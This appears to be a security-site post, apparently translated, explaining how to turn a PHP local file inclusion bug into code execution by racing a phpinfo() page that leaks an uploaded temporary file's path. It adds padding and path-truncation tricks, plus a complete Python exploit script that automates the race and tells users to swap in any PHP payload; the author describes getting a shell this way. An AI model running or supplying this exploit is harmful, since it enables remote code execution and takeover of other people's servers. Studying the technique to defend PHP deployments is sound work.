Using phpinfo() to include temporary files via LFI [POC]

2014-11-12T00:00:00
ID MYHACK58:62201455717
Type myhack58
Reporter idwar
Modified 2014-11-12T00:00:00

Description

Remember the technique published earlier by foreign researchers, exploiting LFI by including PHP's upload temporary files?

At the time it felt a bit impractical, because the temporary file's path and name are unknown. The file name can be matched with wildcard-like characters such as `<`, `>`, `*` and `?` (on Windows, where PHP's filesystem functions hand the pattern to the OS), but with many concurrent requests the server creates many temporary files at once, so the wildcard may not hit the one you want, and the directory where the temporary files are stored can only be guessed.

We know that a POST request carrying a multipart/form-data file upload to any PHP file on the server makes PHP write the upload to a temporary file before the script even runs, whether or not the script touches `$_FILES`. Without the temporary file's path and name you are guessing blindly, and that is where the foreign researchers proposed using phpinfo().

If that upload POST is sent to a page that calls phpinfo(), the page's output echoes `$_FILES`, and the `tmp_name` entry gives the temporary file's full path and name directly. The catch is that PHP deletes the temporary file when the request finishes, so it is a race: the LFI request that includes `tmp_name` must arrive while the phpinfo request is still being served. Note also that phpinfo() page and the LFI must be served from the same filesystem for the path to be meaningful.

Reference:

<http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf>

<http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf>

The paper comes with an exploit script written in Python; I tried it many times and never once succeeded, perhaps because of the indentation? Pasting Python code into a PDF is not a good idea :(

So I wrote my own. If the site is fast it takes a few seconds, if the site is slow a few tens of seconds, to get a shell.

Address:<http://secer.org/pentest/lfi_tmp.py>

If the hosting goes down, save the picture as a .rar file and extract it.


This script is intended only for network-security practitioners and enthusiasts to study and exchange; please do not use it for illegal purposes...... Had to say this anyway.......

-------- 2011.9.12 update--------

sogili tested my script and reported an error, so I worked out a fix for him and am posting the update here.

Sometimes the target site itself responds very slowly; in that case try increasing the padding length to drag out the phpinfo page's response. The padding goes into request headers that phpinfo() echoes back (the `$_SERVER` section), so the response becomes large and PHP is still streaming it, with the temporary file still on disk, while you read `tmp_name` from the beginning of the output and fire the include.

In addition, some servers cannot be truncated with `%00` (null-byte truncation in include was removed in PHP 5.3.4); in that case find another way to cut off whatever the script appends to the path, for example path truncation by padding the path with `.` or `/` characters until it exceeds the maximum path length.
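The race described in the body of the post, together with the padding and truncation tweaks from this update, as an added example. This is not the author's `lfi_tmp.py` and not the script from the insomniasec paper; the host, paths, parameter name, boundary string, padding size and marker payload are all assumptions, and `SAMPLE_PHPINFO` is a constructed fragment in phpinfo()'s HTML layout rather than a real capture. The example goes slightly beyond the post by offering both `%00` and `/.` path truncation as selectable modes.

```python
"""phpinfo()-assisted LFI temporary-file race (added example, not the original post's script)."""
import html
import re
import socket
import urllib.parse

BOUNDARY = "----lfi-tmp-boundary"   # assumed; any token absent from the payload works
MAXPATHLEN = 4096                   # Linux PATH_MAX, used by the "/." truncation mode
# Assumed payload: prints a marker so the race loop can tell when the include ran,
# and drops a persistent file to show the temp file survived long enough to execute.
PAYLOAD = '<?php echo "LFI_OK"; file_put_contents("/tmp/lfi_marker.txt", "hit"); ?>'

# Constructed fragment in phpinfo()'s HTML table format (not a real capture).
SAMPLE_PHPINFO = (
    '<tr><td class="e">_FILES["dummy"]</td><td class="v">Array\n(\n'
    '    [name] =&gt; dummy.txt\n    [type] =&gt; text/plain\n'
    '    [tmp_name] =&gt; /tmp/phpUx7QmZ\n    [error] =&gt; 0\n    [size] =&gt; 55\n)\n</td></tr>'
)


def build_upload_request(host, phpinfo_path, payload, padding_len=5000):
    """Raw HTTP/1.0 multipart POST to the phpinfo() page.

    PHP stores the uploaded part in a temp file before the script runs, and
    phpinfo() echoes $_FILES (with tmp_name) plus $_SERVER.  Padding is put into
    headers and the query string that phpinfo() echoes, so the response is large
    and PHP is still streaming it (temp file still on disk) while we include it.
    HTTP/1.0 is used so the response is not chunk-encoded mid-path.
    """
    body = (
        "--%s\r\n"
        'Content-Disposition: form-data; name="dummy"; filename="dummy.txt"\r\n'
        "Content-Type: text/plain\r\n\r\n%s\r\n--%s--\r\n" % (BOUNDARY, payload, BOUNDARY)
    ).encode()
    pad = "A" * padding_len
    headers = [
        "POST %s?%s HTTP/1.0" % (phpinfo_path, pad),
        "Host: %s" % host,
        "Cookie: PHPSESSID=x; pad=%s" % pad,
        "User-Agent: %s" % pad,
        "Accept: %s" % pad,
        "Accept-Language: %s" % pad,
        "Content-Type: multipart/form-data; boundary=%s" % BOUNDARY,
        "Content-Length: %d" % len(body),
    ]
    return "\r\n".join(headers).encode() + b"\r\n\r\n" + body


# tmp_name is HTML-escaped in phpinfo output; the lookahead makes sure we do not
# accept a path cut off by a recv() chunk boundary.
TMP_RE = re.compile(r"\[tmp_name\] =(?:&gt;|>) ([^\s<]+)(?=[\s<])")


def extract_tmp_name(phpinfo_chunk):
    """Return the temp file path from (possibly partial) phpinfo output, or None."""
    m = TMP_RE.search(phpinfo_chunk)
    return html.unescape(m.group(1)) if m else None


def make_include_param(tmp_name, mode="null"):
    """Value for the vulnerable include parameter, with a suffix that cuts off
    whatever the script appends.  'null' uses %00 (only works before PHP 5.3.4);
    'dots' pushes the path past MAXPATHLEN so old PHP truncates it."""
    if mode == "null":
        return urllib.parse.quote(tmp_name) + "%00"
    if mode == "dots":
        return urllib.parse.quote(tmp_name + "/." * (MAXPATHLEN // 2 + 1))
    raise ValueError("unknown truncation mode: %s" % mode)


def race(host, port, phpinfo_path, lfi_path, lfi_param, payload=PAYLOAD,
         attempts=50, padding_len=5000, mode="null"):
    """Send the upload, read only until tmp_name shows up, then include it
    immediately while the phpinfo request is still being served."""
    req = build_upload_request(host, phpinfo_path, payload, padding_len)
    for _ in range(attempts):
        s = socket.create_connection((host, port), timeout=10)
        s.sendall(req)
        buf, tmp = b"", None
        while tmp is None:
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
            tmp = extract_tmp_name(buf.decode("latin-1"))
        if tmp is None:
            s.close()
            continue
        inc = socket.create_connection((host, port), timeout=10)
        inc.sendall(("GET %s?%s=%s HTTP/1.0\r\nHost: %s\r\n\r\n"
                     % (lfi_path, lfi_param, make_include_param(tmp, mode), host)).encode())
        resp = b""
        while True:
            c = inc.recv(4096)
            if not c:
                break
            resp += c
        inc.close()
        s.close()   # now let the phpinfo request finish; PHP unlinks the temp file
        if b"LFI_OK" in resp:
            return tmp
    return None


if __name__ == "__main__":
    # Assumed target layout: /phpinfo.php and an LFI at /index.php?page=...
    print(race("target.example", 80, "/phpinfo.php", "/index.php", "page"))
```

If the target is slow, raise `padding_len` as the update suggests; if `%00` has no effect, switch `mode` to `"dots"`. Replace `PAYLOAD` with whatever you actually want the included file to do.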
